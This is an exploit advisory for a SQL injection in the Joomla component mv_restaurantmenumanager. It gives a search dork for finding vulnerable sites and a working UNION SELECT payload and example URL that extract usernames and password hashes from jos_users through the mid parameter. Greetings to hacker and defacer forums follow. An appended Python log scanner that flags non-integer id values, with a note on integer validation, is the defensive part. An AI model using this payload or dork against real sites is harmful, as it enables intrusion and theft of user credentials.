=========================================================
Joomla component mv_restaurantmenumanager SQL injection Vulnerability
=========================================================

# Exploit Title : joomla component mv_restaurantmenumanager SQL injection Vulnerability
# Date: 12 April 2010
# Author: Sudden_death (suddendeath404@yahoo.com)
# Software Link : N/A
# Tested on : Windows XP 2
# Platform/Tested on: Windows XP 2 SP 2
# category: webapps/0day
# myweb : http://suddendeath.000space.com/
# dork: inurl:option=com_mv_restaurantmenumanager
# Code :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users

======================================================================

# EXPLOIT / c0de

+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users

# VULN IN HERE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de]

# EXAMPLE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users

[#]-------------------------------------------------------------------
GREETZ TO
WE FORUM: [ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
[#]-------------------------------------------------------------------
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
[#]-------------------------------------------------------------------
note : do not say everything you know, but know everything you say!
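
Added example, not part of the original advisory: a log check for the injection point named above. It flags requests to option=com_mv_restaurantmenumanager whose mid or Venue value is not a plain integer after URL decoding. The function names, the log format and the sample log lines are constructed, and treating both parameters as integer ids is an assumption based on the URLs in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_mv_restaurantmenumanager"
ID_PARAMS = ("mid", "Venue")  # assumption: both are plain integer ids
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2010:10:00:01 +0000] "GET /joomla/index.php?'
    'option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Apr/2010:10:00:09 +0000] "GET /joomla/index.php?'
    'option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+'
    '1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users'
    ' HTTP/1.1" 200 6144',
    '192.0.2.11 - - [12/Apr/2010:10:00:15 +0000] "GET /joomla/index.php?'
    'option=com_content&view=article&id=abc HTTP/1.1" 200 2048',
]


def non_integer_ids(url):
    """Return {param: decoded value} for id parameters that are not plain integers."""
    # parse_qs decodes '+' and %XX, so encoded payloads are compared in clear form.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if COMPONENT not in query.get("option", []):
        return {}
    return {
        name: value
        for name in ID_PARAMS
        for value in query.get(name, [])
        if not re.fullmatch(r"[0-9]+", value)
    }


def scan(lines):
    """Return (client_ip, findings) for every log line whose id parameters fail the check."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        findings = non_integer_ids(match.group(1)) if match else {}
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

The same integer-only test, applied to mid before the value reaches the query, is the server-side fix for this class of bug.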